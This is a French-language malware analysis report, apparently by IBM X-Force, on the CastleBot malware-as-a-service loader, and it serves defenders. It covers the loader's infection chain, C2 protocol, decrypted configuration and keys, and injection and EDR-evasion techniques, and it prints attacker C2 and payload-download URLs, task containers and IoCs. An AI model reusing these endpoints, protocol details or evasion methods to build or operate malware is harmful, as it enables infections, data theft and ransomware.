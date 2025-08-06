Balises
Analyse de l’opération du logiciel malveillant en tant que service CastleBot

Trois moniteurs numériques sur un bureau affichant un message d’erreur critique rouge

Auteur

Golo Mühr

Malware Reverse Engineer

IBM

IBM X-Force a enquêté sur un nouveau framework de malware nommé CastleBot. Le logiciel malveillant est soupçonné de faire partie d’une opération de MaaS (malware-as-a-service) et est spécifiquement conçu pour un déploiement flexible des logiciels malveillants. CastleBot est actuellement utilisé par des cybercriminels pour tout diffuser, des infostealers aux portes dérobées comme NetSupport et WarmCookie, qui ont été liés à des attaques de ransomware.

Ce qui rend CastleBot particulièrement inquiétant, c’est la façon dont il est distribué : le plus souvent via des installateurs de logiciels trojanisés téléchargés depuis de faux sites, incitant des utilisateurs sans méfiance à lancer eux-mêmes l’infection. Cette technique s’inscrit dans la tendance croissante observée par X-Force. Elle est souvent rendue possible par le biais de techniques de référencement abusives (SEO poisoning), qui permettent à des pages malveillantes de se classer plus haut dans les moteurs de recherche que les distributeurs de logiciels légitimes. Une fois à l’intérieur, CastleBot suit un processus en trois étapes : un stager/téléchargeur, un chargeur et une porte dérobée principale, qui demande un ensemble de tâches à son serveur de commande et de contrôle (C2). Les informations recueillies sur la machine infectée permettent aux opérateurs de filtrer facilement les victimes, de gérer les infections en cours et de déployer avec précision des logiciels malveillants sur des cibles de grande valeur.

CastleBot continue d’évoluer, et nos recherches montrent qu’il ne fait probablement que commencer. Dans ce rapport, nous détaillons comment il fonctionne, se propage et pourquoi cela est important.

Principales conclusions :

  • CastleBot est un nouveau logiciel malveillant qui fonctionne probablement comme un logiciel malveillant en tant que service, qui peut être utilisé pour diffuser un large éventail de charges utiles malveillantes
  • Les charges utiles qui s’ensuivent vont des infostealers aux portes dérobées liées aux attaques par ransomware, telles que NetSupport et WarmCookie
  • X-Force a observé que les installateurs de logiciels trojanisés constituent le vecteur d’infection le plus courant pour déployer CastleBot
  • Le framework CastleBot comprend trois composants : un stager, un loader et un core, et semble être en cours de développement actif.
  • Le logiciel malveillant semble permettre aux opérateurs de filtrer facilement les victimes, de mettre à jour les charges utiles et de gérer plusieurs campagnes tout au long de leur cycle de vie

Aperçu

CastleBot est apparu pour la première fois début 2025. X-Force a constaté une augmentation du volume d’échantillons et de différentes charges utiles à partir du mois de mai, et a depuis observé le déploiement de diverses portes dérobées et charges utiles de vol d’informations. Le vecteur d’infection le plus courant de CastleBot est un logiciel trojanisé, qui s’inscrit dans une tendance que X-Force continue d’observer depuis 2024. Des progiciels et des programmes d’installation trojanisés sont souvent distribués via de faux sites Web qui utilisent le SEO pour attirer des victimes. CastleBot était également distribué via des référentiels GitHub., en se faisant passer pour un logiciel légitime, et via la technique populaire ClickFix.

X-Force a identifié trois composants au sein du framework de malware CastleBot : un stager, un loader et le core/backdoor de CastleBot.

Un organigramme illustrant la chaîne d’infection de CastleBot
Fig. 1 : chaîne d’infection CastleBot

Veuillez noter que les précédents signalements publics de Prodraft font référence au même framework du logiciel malveillant que « CastleLoader ».

CastleBot Stager

Dans la plupart des cas, le composant central de CastleBot est déployé via un stager shellcode, qui fait partie de la même famille de malwares CastleBot. Le stager est une charge utile shellcode légère qui peut être injectée par n’importe quel autre loader de premier niveau. X-Force a observé divers chiffreurs utilisés avec CastleBot, dont Dave, un chiffreur basé sur AutoIt, et des chiffreurs simples compilés en C.

Le logiciel malveillant utilise l’algorithme de hachage DJB2 pour résoudre les API nécessaires à l’exécution. Avant chaque appel API, il charge le DLL correspondant et parcourt la table d’adresses d’exportation (EAT) pour rechercher la fonction API via des hachages DJB2 pré-générés. Si l’exportation est transférée vers une autre DLL, le stager analyse le nom de la DLL, le charge et résout la fonction via GetProcAddress.

Une fois exécuté, le stager télécharge deux charges utiles via HTTP avec le User Agent « Googlebot ». Les chemins d’URL sont similaires entre les échantillons et pointent vers le même serveur C2 que le composant central de CastleBot.

Exemples d’URL de téléchargement :

http://173.44.141[.]89/service/download/data_3x.bin

http://173.44.141[.]89/service/download/data_4x.bin

Capture d’écran du stager CastleBot décompilé
Fig. 2 : capture d’écran du Stager CastleBot décompilé

Les deux charges utiles sont déchiffrées via une chaîne XOR codée en dur, dans ce cas « GySDoSGySDoS » (encodée en UTF-16), révélant un fichier PE (noyau de CastleBot) et un stub de shellcode (chargeur de CastleBot).

Le stager utilise ensuite VirtualProtect pour permettre l’exécution dans le heap de la région mémoire stockant la deuxième charge utile de shellcode déchiffrée. Celle-ci, agissant comme un loader, est exécutée directement en mémoire et reçoit en argument un pointeur vers le PE déchiffré.

CastleBot Loader

Le CastleBot Loader est un chargeur PE complet qui commence par mapper chaque section du PE fourni dans une nouvelle région mémoire allouée à l’aide de NtAllocateVirtualMemory. Il corrige ensuite les déplacements nécessaires, résout les importations, définit les options de protection mémoire appropriées et exécute les fonctions de rappel TLS existantes.

Notamment, le loader configure également une nouvelle structure LDR_DATA_TABLE_ENTRY et le LDR_DDAG_NODE correspondant (étendu dans Windows 8 et versions ultérieures), qui sont ensuite ajoutés aux listes doublement chaînées PEB_LDR_DATA contenant les modules chargés pour chaque processus. Pour les agents EDR surveillant le PEB, la charge utile injectée apparaîtrait davantage comme si elle avait été légitimement chargée par le système d’exploitation.

CastleBot Loader configure les structures LDR_DATA_TABLE_ENTRY et LDR_DDAG_NODE et les insère dans les listes du module PEB_LDR_DATA
Fig. 3 : CastleBot Loader configure les structures LDR_DATA_TABLE_ENTRY et LDR_DDAG_NODE et les insère dans les listes du module PEB_LDR_DATA

Sauf si le fichier injecté est un DLL, le champ ImageBaseAddress du PEB est également défini sur l’adresse de base de la charge utile injectée.

Enfin, pour exécuter la charge utile, le loader CastleBot exécute le point d’entrée ou alloue une nouvelle console pour les applications console.

Code illustrant la fonction principale de CastleBot Loader
Figure 4 : Fonction principale du loader CastleBot

Dans l’échantillon analysé ci-dessus, la charge utile injectée est la porte dérobée x86 CastleBot (202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04).

CastleBot Core

Le noyau de CastleBot utilise le même mécanisme de résolution d’API que les composants stager et loader, à l’exception de l’algorithme de hachage, qui est le hachage AP, développé par Arash Partow.

Tout d’abord, la porte dérobée commence par déchiffrer sa configuration. Presque toutes les chaînes dans le binaire, y compris celles qui font partie de la configuration, sont stockées en UTF-16 et déchiffrées en ligne via une clé XOR unique de 4 octets pour chaque chaîne. Lors du déchiffrement, la structure de configuration suivante est créée :

struct CONFIG
{
  wchar_t *p_campaign_id;   //
81a16c72f9c9f4ea94d68b609c78f72d4a8725e7b8f6949b12d8871b6c6843e3
  int size_utf16_campaign_id;
  int size_utf8_campaign_id;
  wchar_t *p_URL;           // http://173.44.141[.]89/service
  int size_utf16_URL;
  int size_utf8_URL;
  wchar_t *p_useragent;     // fTniXgvddlgotdAXke2CRZy
  int size_utf16_useragent;
  int size_utf8_useragent;
  wchar_t *p_mutex_name;    // 10KCnWHtIoABhkL2Cl3u
  int size_utf16_mutex_name;
  int size_utf8_mutex_name;
  DATA_BUFFER_STRUCT *p_chacha_key;     //
0x84fda801005fdd07340a1ca6d8a351adc6cfe9e39ffe7498a0955209ad2f7978
  int zero_34;
  DATA_BUFFER_STRUCT *p_chacha_nonce;       // 0x0b5ac47bfeeaf4af61726a5c
  int zero_3C;
};

Le logiciel malveillant tente de créer un mutex, en utilisant le nom de la configuration, pour s’assurer qu’une seule instance est en cours d’exécution. Dans l’étape suivante, il envoie une requête HTTP GET à l’URL codée en dur pour récupérer ses paramètres, en utilisant l’ID de campagne dans le chemin de l’URL :

GET
/service/settings/81a16c72f9c9f4ea94d68b609c78f72d4a8725e7b8f6949b12d8871b6c6843e3 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: fTniXgvddlgotdAXke2CRZy
Host: 173.44.141[.]89

En réponse, CastleBot reçoit un bloc de données chiffrées.

Communication C2

Toute la communication C2 est chiffrée via l’algorithme symétrique ChaCha, à l’exception de la requête GET initiale du logiciel malveillant. Après le déchiffrement, le protocole C2 utilise une structure de données personnalisée sérialisée, appelée en interne conteneur, qui peut stocker des valeurs de différents types.

Conteneurs sérialisés

À la racine de la structure de données sérialisée se trouve toujours un champ de type ContainerFieldArray. Les structures ci-dessous définissent plus précisément comment les types tableau et booléen sont configurés :

enum ContainerFieldType {
    CONTAINER_FIELD_TYPE_NONE,
    CONTAINER_FIELD_TYPE_BOOL,
    CONTAINER_FIELD_TYPE_UINT8,
    CONTAINER_FIELD_TYPE_INT8,
    CONTAINER_FIELD_TYPE_UINT16,
    CONTAINER_FIELD_TYPE_INT16,
    CONTAINER_FIELD_TYPE_UINT32,
    CONTAINER_FIELD_TYPE_INT32,
    CONTAINER_FIELD_TYPE_UINT64,
    CONTAINER_FIELD_TYPE_INT64,
    CONTAINER_FIELD_TYPE_STRINGA,
    CONTAINER_FIELD_TYPE_STRINGW,
    CONTAINER_FIELD_TYPE_BLOB,
    CONTAINER_FIELD_TYPE_ARRAY
}

struct FIELD_NAME {
    WORD fieldname_len;
    wchar fieldname[];
}

struct CONTAINER_FIELD_ARRAY {
    ContainerFieldType type;
    FIELD_NAME field_name;
    SIZE_T size;
    union {
        CONTAINER_FIELD_NONE none;
        CONTAINER_FIELD_BOOL bool;
        CONTAINER_FIELD_UINT8 uint8;
        CONTAINER_FIELD_INT8 int8;
        CONTAINER_FIELD_UINT16 uint16;
        CONTAINER_FIELD_INT16 int16;
        CONTAINER_FIELD_UINT32 uint32;
        CONTAINER_FIELD_INT32 int32;
        CONTAINER_FIELD_UINT64 uint64;
        CONTAINER_FIELD_INT64 int64;
        CONTAINER_FIELD_STRINGA stringa;
        CONTAINER_FIELD_STRINGW stringw;
        CONTAINER_FIELD_BLOB blob;
        CONTAINER_FIELD_ARRAY array;
    };
}

struct CONTAINER_FIELD_BOOL {
    ContainerFieldType type; // CONTAINER_FIELD_TYPE_BOOL=0x01
    FIELD_NAME field_name;
    BYTE bool;
}

Lors de l’analyse du conteneur déchiffré définissant les paramètres demandés par la porte dérobée, les données commencent par l’octet 0x0D, indiquant le type ContainerFieldArray.Cet octet est suivi du nom du champ, qui est lui-même la longueur sur 2 octets, suivie du nom codé en UTF-16. Après le nom, un champ de tableau définit une longueur de données sur 4 octets, suivie des données elles-mêmes, qui commencent à nouveau par le premier octet définissant le type.

Conteneur de paramètres CastleBot

Les paramètres reçus par l’échantillon analysé ci-dessus sont analysés comme suit.

Données sérialisées :

00000000  0d 08 00 72 00 6f 00 6f 00 74 00 89 00 00 00 0d  |...r.o.o.t......|
00000010  10 00 73 00 65 00 74 00 74 00 69 00 6e 00 67 00  |..s.e.t.t.i.n.g.|
00000020  73 00 72 00 00 00 01 18 00 72 00 75 00 6e 00 5f  |s.r......r.u.n._|
00000030  00 61 00 73 00 5f 00 61 00 64 00 6d 00 69 00 6e  |.a.s._.a.d.m.i.n|
00000040  00 00 01 0e 00 61 00 6e 00 74 00 69 00 5f 00 76  |.....a.n.t.i._.v|
00000050  00 6d 00 00 01 1e 00 70 00 72 00 65 00 76 00 65  |.m.....p.r.e.v.e|
00000060  00 6e 00 74 00 5f 00 72 00 65 00 73 00 74 00 61  |.n.t._.r.e.s.t.a|
00000070  00 72 00 74 00 00 01 1e 00 73 00 68 00 6f 00 77  |.r.t.....s.h.o.w|
00000080  00 5f 00 66 00 61 00 6b 00 65 00 5f 00 65 00 72  |._.f.a.k.e._.e.r|
00000090  00 72 00 6f 00 72 00 00                          |.r.o.r..|

Objet désérialisé :

root: {
    settings: {
        run_as_admin: False,
        anti_vm: False,
        prevent_restart: False,
        show_fake_error: False,
    }
}

Pour chaque paramètre activé, les actions suivantes sont effectuées par CastleBot :

run_as_admin : le logiciel malveillant exécutera son processus parent via « cmd.exe /c <parent_process>» via ShellExecuteW avec le verbe « runas » pour le lancer en tant qu’administrateur.

anti_vm : CastleBot utilisera l’instruction cpuid avec la feuille 0x40000000 pour tenter de détecter les environnements de l’hyperviseur. Si VMware ou Parallels est détecté, le logiciel malveillant sera arrêté.

prevent_restart : CastleBot créera un nouveau fichier caché dans %PROGRAMDATA% avec le nom correspondant au nom du mutex intégré à la configuration. Si le fichier existe déjà, le logiciel malveillant s’arrêtera.

show_fake_error : le logiciel malveillant affiche une boîte de message « Erreur système » avec le message « Le programme ne peut pas démarrer car VCRUNTIME140.dll est manquant sur votre ordinateur. Essayez de réinstaller le programme pour résoudre ce problème.

Énumération des hôtes

Dans les étapes suivantes, CastleBot recueille des informations sur l’hôte infecté pour s’inscrire auprès du serveur C2 et demander des tâches.

  • Nom d’utilisateur via GetUserNameW
  • Nom NetBIOS via GetComputerNameW
  • Architecture système via IsWow64Process
  • Nom de domaine DNS local, en utilisant LsaQueryInformationPolicy pour récupérer la structure PolicyDnsDomainInformation. La valeur par défaut est « WORKGROUP ».
  • Numéro de série de volume récupéré via GetVolumeInformationW. CastleBot l’utilise pour calculer un identifiant unique de victime à l’aide d’un générateur linéaire congruentiel (LCG) avec un multiplicateur de 0x41C64E6D et un addenda de 0x3039.
  • Version Windows via RtlGetVersion et GetSystemMetrics(89)

Les informations sont compilées dans l’objet ci-dessous, suivies d’une sérialisation et d’un chiffrement ChaCha :

root: {
    information: {
        access_key: "fTniXgvddlgotdAXke2CRZy",
        campaign_identifier:
"81a16c72f9c9f4ea94d68b609c78f72d4a8725e7b8f6949b12d8871b6c6843e3",
        machine_id: <calculated_victim_id>,
        build_version: "1.0",
        username: <username>,
        computer_name: <NetBIOS name>,
        domain_name: <local DNS domain name>,
        windows_version: <Windows version>,
        arch: <system architecture>,
    }
}

Les valeurs codées sont la clé d’accès (identique à l’agent utilisateur de la configuration), l’identifiant de la campagne et la version du build CastleBot, qui est "1.0" pour l’échantillon analysé.

La porte dérobée envoie les données chiffrées dans une requête HTTP POST à

http://173.44.141[.]89/service/tasks

 La réponse est un conteneur chiffré plus volumineux contenant les tâches préconfigurées de CastleBot.

Conteneur de tâches CastleBot

Le conteneur reçu du serveur C2 par l’échantillon CastleBot analysé est déchiffré et désérialisé dans un objet avec les champs suivants :

root: {
    access_key: "fTniXgvddlgotdAXke2CRZy",
    tasks: {
        {
            id: 16,
            url: "http://173.44.141[.]89/service/download/docusign2.exe",
            install_path: "%TEMP%\docusign-auth2.exe",
            launch_method: 1,
            argument: "",
            run_as_admin: False,
            startup_method: 1,
            is_encrypted_container: False,
            container_encryption_key: "",
            auto_unpack_zip: False,
            zip_executable_files: {},
        }
    }

}

Le champ « tâches » est un type personnalisé de tableau décrit ci-dessus, contenant au moins un tableau non nommé (nom de longueur zéro), chacun représentant une tâche. CastleBot peut également recevoir un tableau contenant plusieurs tâches à exécuter les unes après les autres. Chaque tâche contient un identifiant et plusieurs champs détaillant comment la tâche doit être exécutée, et ils sont copiés dans une structure de tâche lors de la désérialisation.

Exécution des tâches

Le champ le plus important dans chaque tâche est le « launch_method », qui détermine le type de charge utile à gérer par CastleBot.

Méthode de lancement

Charge utile

Exécution

1

EXE téléchargé depuis l’URL

Via CreateProcessW ou ShellExecuteW

2

DLL téléchargée depuis l’URL

Via ShellExecuteW et rundll.exe

3

DLL téléchargée depuis l’URL

Via LoadLibraryW

4

PE téléchargé depuis l’URL

Injecté dans un nouveau processus

5

Commande PowerShell dans le champ "argument"

Via ShellExecuteW

6

Commande BAT dans le champ "argument"

Via ShellExecuteW

Les autres champs peuvent être utilisés pour définir des options spécifiques pour l’exécution de la tâche :

Nom du champ

Description

id

ID unique de la tâche, utilisé pour signaler au serveur C2 que la tâche a été exécutée avec succès

url

URL pour récupérer la charge utile. Les charges utiles sont souvent hébergées sur le serveur C2 à l’adresse http://<castlebot_c2>/service/download/<payload_name>

install_path

Le chemin d’accès cible pour l’injection du processus, qui peut contenir des variables d’environnement, ou simplement ":SELF:", qui injecte la charge utile dans un doublon du processus parent.

argument

Arguments pour les processus dans install_path, ou commandes pour l’exécution PowerShell/BAT

run_as_admin

Si cette option est activée, les exécutions via ShellExecuteW utiliseront le verbe "runas" (exécuter en tant que).

startup_method

Si la valeur est définie sur « 1 », la persistance est créée pour la charge utile via une tâche planifiée déclenchée à chaque connexion.

is_encrypted_container

Si cette option est activée, la charge utile téléchargée à partir de l’URL est déchiffrée en RC4 et analysée comme un autre conteneur pour récupérer la charge utile de la tâche.

container_encryption_key  

Clé RC4 utilisée avec le conteneur chiffré.

auto_unpack_zip

Si cette option est activée, la charge utile est traitée comme un fichier ZIP et extraite manuellement.

zip_executable_files

Une liste des fichiers cibles dans l’archive ZIP qui doivent être exécutés selon la méthode de lancement.

wow64_bypass

Une option ajoutée récemment, permettant de spécifier si des binaires système 32 bits doivent être lancés à la place.

  

Injection de processus

CastleBot prend en charge l’injection de processus simples pour les charges utiles PE. Il commence par créer un nouveau processus suspendu, basé sur le chemin d’installation et les champs d’argument. Afin de fonctionner sous Windows 11 24H2 et les versions ultérieures, les développeurs du logiciel malveillant ont choisi d’accrocher la fonction NtManageHotPatch de NTDLL en mémoire afin de contourner le contrôle de la mémoire nouvellement ajouté. Voir le post de Hasherezade pour plus de détails. Il fournit également l’implémentation POC exacte utilisée par CastleBot :

Code illustrant CastleBot interceptant NtManageHotPatch
Figure 5 : CastleBot intercepte NtManageHotPatch

Le reste de l’injection de processus suit les techniques d’injection habituelles en allouant de la mémoire dans le processus cible, en écrivant les sections dans la mémoire tampon et en modifiant le contexte du thread avant de reprendre l’exécution.

code décrivant l’injection de processus CastleBot
Figure 6 : Injection du processus CastleBot

Persistance

Si le champ de la méthode de démarrage est défini sur « 1 », CastleBot établit la persistance en créant une tâche planifiée. Pour enregistrer la tâche, le logiciel malveillant utilise l’interface COM ITaskService pour se connecter au service Task Scheduler. Il crée une nouvelle tâche et une action d’exécution pour la charge utile cible, qui est déclenchée chaque fois que l’utilisateur actuel se connecte (TASK_TRIGGER_LOGON).

Achèvement de la tâche

Chaque tâche dans le conteneur « tâches » est gérée de manière itérative selon ses champs spécifiés. Une fois qu’une tâche a été exécutée sans erreur, le logiciel malveillant signale la réussite de l’exécution via une requête HTTP GET à :

http://<c2_server>/service/tasks/complete/id/<task_id>

Mises à jour de juillet 2025

X-Force a observé une variante mise à jour du noyau CastleBot, prenant en charge de nouvelles méthodes de lancement et une option appelée « wow64_bypass », utilisée spécifiquement pour lancer des binaires système 32 bits dans le dossier SysWOW64.

Méthode de lancement

Charge utile

Exécution

1

EXE téléchargé depuis l’URL

Via CreateProcessW ou ShellExecuteW

2

DLL téléchargée depuis l’URL

Via ShellExecuteW et rundll.exe

3

DLL téléchargée depuis l’URL

Via ShellExecuteW et regsrv32.exe

4

DLL téléchargée depuis l’URL

Via LoadLibraryW

5

PE téléchargé depuis l’URL

Injection dans un nouveau processus via un ancien mécanisme

6

PE téléchargé depuis l’URL

Injection dans le nouveau processus via PE Loader

7

Commande PowerShell dans le champ "argument"

Via ShellExecuteW

8

Commande BAT dans le champ "argument"

Via ShellExecuteW

9

MSI téléchargé à partir de l’URL

Via ShellExecuteW et msiexec.exe

La méthode supplémentaire d’injection de processus (méthode de lancement 6) écrit à la fois le composant CastleBot Loader (voir la section d’analyse ci-dessus) et la charge utile PE dans le processus cible. Elle utilise ensuite QueueUserAPC et ResumeThread pour transférer l’exécution au chargeur, qui charge correctement la charge utile PE dans la mémoire et l’exécute.

code représentant l’injection de processus via QueueUserAPC
Fig. 7 : injection de processus via QueueUserAPC

Cette technique utilise beaucoup moins d’appels à l’API WriteProcessMemory et fournit une fonctionnalité de chargement plus complète à partir du stub CastleBot Loader.

Campagnes et charges utiles

L’objectif principal de CastleBot est de permettre le déploiement de charges utiles secondaires sur les machines des victimes. X-Force a découvert plusieurs charges utiles différentes distribuées par CastleBot, souvent avec plusieurs charges utiles dans une même campagne. Les charges utiles sont plus ou moins sophistiquées, allant de simples voleurs d’informations à des portes dérobées plus performantes telles que NetSupport ou WarmCookie, qui ont été associées à des attaques de ransomware.

Le framework CastleBot MaaS semble permettre aux opérateurs de filtrer les machines infectées et de mettre facilement à jour les charges utiles pour gérer plusieurs campagnes actives avec une grande flexibilité, selon l’analyse de Prodaft et les capturesd’écran du panneau C2. Grâce à la fluidité des charges utiles et à la capacité de l’opérateur d’ajouter plusieurs tâches et charges utiles à une seule campagne, les chaînes d’infection de CastleBot sont plus complexes que les étapes statiques traditionnelles des logiciels malveillants.

X-Force ne dispose d’aucune preuve d’une publicité généralisée du MaaS sur le Dark Web, ce qui pourrait indiquer que le service n’est actuellement vendu qu’à un groupe privé d’affiliés.

NetSupport

Sans identifier le logiciel malveillant comme son propre framework, divers fragments des campagnes menant à NetSupport ont été signalés publiquement par d’autres chercheurs en juin et juillet 2025.

DomainTools observé de fausses pages DocuSign utilisant la technique ClickFix pour exécuter un script PowerShell malveillant, qui télécharge à son tour CastleBot pour déployer NetSupport. IoCs de la campagne  

a2898897d3ada2990e523b61f3efaacf6f67af1a52e0996d3f9651b41a1c59c9: PowerShell
script downloading and extracting a ZIP archive before executing “jp2launcher.exe”
d6eea6cf20a744f3394fb0c1a30431f1ef79d6992b552622ad17d86490b7aa7b:
“msvcp14.dll” crypted  CastleBot stager DLL-sideloaded by “jp2launcher.exe”.
http://mhousecreative[.]com/service/ -  CastleBot C2 server for stager and core components.
“5702b2a25802ff1b520c0d1e388026f8074e836d4e69c10f9481283f886fd9f4” - CastleBot campaign ID
http://mhousecreative[.]com/service/download/general_1 - NetSupport download
URL hosted on  CastleBot C2 server
2a2cd6377ad69a298af55f29359d67e4586ec16e6c02c1b8ad27c38471145569: NetSupport payload

L’Unit42 de PaloAlto a signalé une activité similaire avec des sites Web imitant DocuSign et Okta, utilisant ClickFix pour déployer CastleBot via les composants stager et loader initiaux. Elle contient une analyse partielle d’un « NetSupport RAT Loader », que X-Force identifie comme étant le framework CastleBot. Campagne IoCs :

8b2ebeff16a20cfcf794e8f314c37795261619d96d602c8ee13bc6255e951a43: PowerShell
script downloading and extracting a ZIP archive before executing “jp2launcher.exe”
cbaf513e7fd4322b14adcc34b34d793d79076ad310925981548e8d3cff886527:
“msvcp14.dll” crypted  CastleBot stager DLL-sideloaded by “jp2launcher.exe”. 
http://80.77.23[.]48/service/ -  CastleBot C2 server for stager and core components.
“5702b2a25802ff1b520c0d1e388026f8074e836d4e69c10f9481283f886fd9f4” -  CastleBot campaign ID

WarmCookie

L’une des charges utiles les plus intéressantes de CastleBot est la porte dérobée WarmCookie (alias Quickbind, BadSpace). Elle fait probablement partie d’un vaste écosystème de cybercriminalité permettant des attaques par ransomware et figurait parmi les familles de logiciels malveillants ciblées avec succès par les forces de l’ordre internationales lors de l’opération Endgame en 2024. Auparavant, l’acteur de la menace Hive0137 a distribué WarmCookie par le biais de campagnes d’e-mails malveillants, bien qu’aucune activité significative n’ait été observée en 2025, selon les conclusions de X-Force. WarmCookie est publiquement lié aux opérations TA866/Asylum Ambuscade.

La campagne observée par X-Force a commencé en juin avec une archive ZIP militarisée imitant un programme d’installation pour un logiciel légitime SSMS-20.2-enu.zip (4766f5cc6501fc40c7151a0ce1c9d2cc49fca9b0b9cab2a206dd2426947e9afe). Parmi les composants légitimes, il contient un exécutable malveillant SSMS_Windows.x64.exe (05ecf871c7382b0c74e5bac267bb5d12446f52368bb1bfe5d2a4200d0f43c1d8) identifié comme une variante de Dave Loader, qui déchiffre une charge utile stockée dans ses ressources. Après le déchiffrement, Dave Loader injecte la porte dérobée CastleBot (202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04), qui reçoit pour tâche de télécharger et d’exécuter une charge utile WarmCookie (5bca7f1942e07e8c12ecd9c802ecdb96570dfaaa1f44a6753ebb9ffda0604cb4) à partir de

http://173.44.141[.]89/service/download/docusign2.exe

Le serveur WarmCookie C2 est situé à l’adresse suivante :

170.130.165[.]112

Un deuxième échantillon découvert plus tard en juin utilisait un exécutable similaire, imitant un programme d’installation du logiciel Zscaler-windows-4.4.0.379-installer-x64.exe (bf21161c808ae74bf08e8d7f83334ba926ffa0bab96ccac42dde418270387890). Le binaire compilé par AutoIt est un simple chargeur de shellcode, exécutant le stager CastleBot intégré, qui à son tour télécharge le même binaire de porte dérobée CastleBot (202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04).

Les exécutions en bac à sable de l’échantillon parent CastleBot indiquent que le même affilié a peut-être déposé une charge utile StealC avec un serveur C2 à "http://107.158.128[.]105/c91252f9ab114f26.php" pendant la campagne ; cependant, X-Force n’a pas pu récupérer d’échantillon. 

Les deux campagnes utilisent l’ID de campagne CastleBot "81a16c72f9c9f4ea94d68b609c78f72d4a8725e7b8f6949b12d8871b6c6843e3".

Infostealers

De plus, X-Force suit plusieurs campagnes de CastleBot auprès de différents voleurs d’informations. Le logiciel malveillant prend en charge plusieurs tâches de téléchargement pour n’importe quelle campagne, ce qui entraînera le déploiement de plusieurs charges utiles sur le même client. L’exécutable AMD_Chipset_DriverOnly_DCH_AMD_Z_V1.2.0.105_20238.exe (e6aab1b6a150ee3cbc721ac2575c57309f307f69cd1b478d494c25cde0baaf85) charge la charge utile du noyau CastleBot intégré (b45cce4ede6ffb7b6f28f75a0cbb60e65592840d98dcb63155b9fa0324a88be2 ) à partir de sa ressource et l’exécute. Le point de terminaison des paramètres du serveur C2 est situé à

http://62.60.226[.]73/service/settings/32e7ebb66296d22b4cf28dbe6d8dfd314590175d5fc2168609886985d6c807c1

qui transmettait au total trois tâches distinctes dans un seul message C2, chacune déployant une charge utile différente :

  • ID de la tâche : 0x16
    • URL de téléchargement : https[:]//google.herionhelpline[.]com/app/AcerUSBUpdate.exe
    • Charge utile : 03122e46a3e48141553e7567c659642b1938b2d3641432f916375c163df819c1 (Rhadamanthys)
    • Chemin d’installation : aucun
    • Méthode de lancement : 6
  • ID de la tâche : 0x17 
    • URL de téléchargement : https[:]//google.herionhelpline[.]com/application/light1_v5_signed.html
    • Charge utile : 12de997634859d1f93273e552dec855bfae440dcf11159ada19ca0ae13d53dff (Remcos)
    • Chemin d’installation : %ProgramData %\AmazonApp\AmazonWebServiceUpdate.exe
    • Méthode de lancement : 1
  • ID de la tâche : 0x18
    • https[:]//google.herionhelpline[.]com/app/SlackUpdateWeb.html
    • Charge utile : c8f95f436c1f618a8ef5c490555c6a1380d018f44e1644837f19cb71f6584a8a (DeerStealer)
    • Chemin d’installation : %AppData %\SlackUpdate\SlackServiceUpdate.exe
    • Méthode de lancement : 1

X-Force a également découvert des campagnes déployant SecTopRAT (alias ArechClient), HijackLoader (alias Shadowladder) et MonsterV2 (alias Aurotun Stealer).

SecTopRAT et HijackLoader :

  • GlobalProtect-win-6.3.zip avec un exécutable chargeant latéralement msvcp140.dll (8bf93cef46fda2bdb9d2a426fbcd35ffedea9ed9bd97bf78cc51282bd1fb2095)
  • Serveur CastleBot C2 : http[ :]//107.158.128[.]45/service/settings/81a16c72f9c9f4ea94d68b609c78f72d4a8725e7b8f6949b12d8871b6c6843e3
  • Charge utile hébergée à l’adresse http[:]//107.158.128[.]45/service/download/Exchanger32.zip (4834bc71fc5d3729ad5280e44a13e9627e3a82fd4db1bb992fa8ae52602825c6)

MonsterV2 :

  • libssl-1_1.dll (53dddae886017fbfbb43ef236996b9a4d9fb670833dfa0c3eac982815dc8d2a5) DLL chargée latéralement, injecte par réflexion le stager CastleBot
  • Serveur CastleBot C2 : http[:]//107.158.128[.]45/service/settings/8306a6b35d4be6de72be58860791e3644468fd67f675e4045a246dd27fa5692c
  • Charge utile hébergée à l’adresse http[:]//107.158.128[.]45/service/download/CCver_Setup.exe (ab725f5ab19eec691b66c37c715abd0e9ab44556708094a911b84987d700aa62)

Conclusion

CastleBot est la dernière preuve d’un changement dans les vecteurs d’infection initiaux du paysage de la cybercriminalité. Les portes dérobées et les frameworks MaaS sont distribués de plus en plus par le biais de faux sites Web, dans le cadre de logiciels trojanisés ou via la technique ClickFix. Quelques mois seulement après l’observation d’une augmentation de l’activité de CastleBot, les développeurs ont déjà ajouté plusieurs nouvelles fonctionnalités et essaieront probablement de s’adapter aux solutions EDR et de sécurité réseau. L’activité actuelle suggère que de nombreux affiliés utilisent CastleBot pour déployer des infostealers et des portes dérobées, ce qui pourrait conduire à des incidents de ransomware à fort impact.

Il est conseillé aux lignes de défense de rester vigilantes quant aux techniques mentionnées dans ce rapport et de prendre les mesures appropriées pour réduire le risque d’infection par CastleBot.

Recommandations

  • Assurez-vous que les logiciels EDR et les contrôles de sécurité associés sont à jour
  • Formez les utilisateurs à faire preuve d’une extrême prudence lorsqu’ils téléchargent des logiciels et à s’abstenir d’installer des logiciels non approuvés ou non vérifiés.
  • Mettez en œuvre l’authentification multifacteur et surveillez les fuites d’identifiants de l’entreprise
  • Configurez des alertes ou envisagez de bloquer les connexions HTTP sortantes (non-HTTPS), et en particulier les URL contenant des adresses IP

Indicateurs de compromission

Indicateur

Type d’indicateur

Contexte

http://173.44.141[.]89/service/
download/data_4x.bin

URL

URL de téléchargement du noyau de CastleBot

http://173.44.141[.]89/service/
download/data_3x.bin

URL

URL de téléchargement de CastleBot Loader

http://173.44.141[.]89/service/

URL

Serveur CastleBot C2

http://mhousecreative
[.]com/service/

URL

Serveur CastleBot C2

http://80.77.23[.]48/service/

URL

Serveur CastleBot C2

http://62.60.226[.]73/service/

URL

Serveur CastleBot C2

http://107.158.128[.]45/service/

URL

Serveur CastleBot C2

http://62.60.226[.]73/service/

URL

Serveur CastleBot C2

202f6b6631ade2c41e4762e5
877ce0063a3beabce0c3f85
64b6499a1164c1e04

SHA256

Noyau de CastleBot

a2898897d3ada2990e523b6
1f3efaacf6f67af1a52e0996d3f
9651b41a1c59c9

SHA256

Script PowerShell pour télécharger et extraire une archive ZIP

d6eea6cf20a744f3394fb0c
1a30431f1ef79d6992b55262
2ad17d86490b7aa7b

SHA256

Stager crypté CastleBot

http://mhousecreative[.]com
